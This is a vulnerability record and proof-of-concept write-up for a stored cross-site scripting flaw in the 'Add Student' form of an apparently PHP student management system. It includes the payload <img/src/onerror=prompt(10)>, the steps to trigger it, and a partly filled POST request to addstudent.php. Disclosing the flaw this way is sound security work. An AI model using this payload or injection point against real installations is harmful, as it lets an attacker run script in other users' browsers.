N/A CWE-79 N/A High
N/A High Remote 2022-04-08
CVSS: 3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L 0.02192 0.50148

# sms-Add_Student-Stored_XSS-POC
# Author: D4rkP0w4r 

Description => Stored_XSS at Add Student

# Step to Reproduct
* Login to admin -> Students -> Add Student -> input payload <img/src/onerror=prompt(10)> at Enter Name

# Exploit
* Input payload at Enter Name -> clicked Add Students -> access All Student -> The XSS will trigger
* Log out admin and typed roll number -> The XSS will trigger

# Vulnerable Code
* When inserting into the database, the input is not filtered out bad characters

# POC 
* Injection Point 

Content-Disposition: form-data; name="name"


* Request

POST /sms/admin/addstudent.php HTTP/1.1
Host: localhost:8080
Content-Length: 992
Content-Disposition: form-data; name="rollno"

Content-Disposition: form-data; name="name"

Content-Disposition: form-data; name="contact"

Content-Disposition: form-data; name="standerd"

Content-Disposition: form-data; name="city"

Content-Disposition: form-data; name="email"

[email protected]
Content-Disposition: form-data; name="gender"

Content-Disposition: form-data; name="submit"


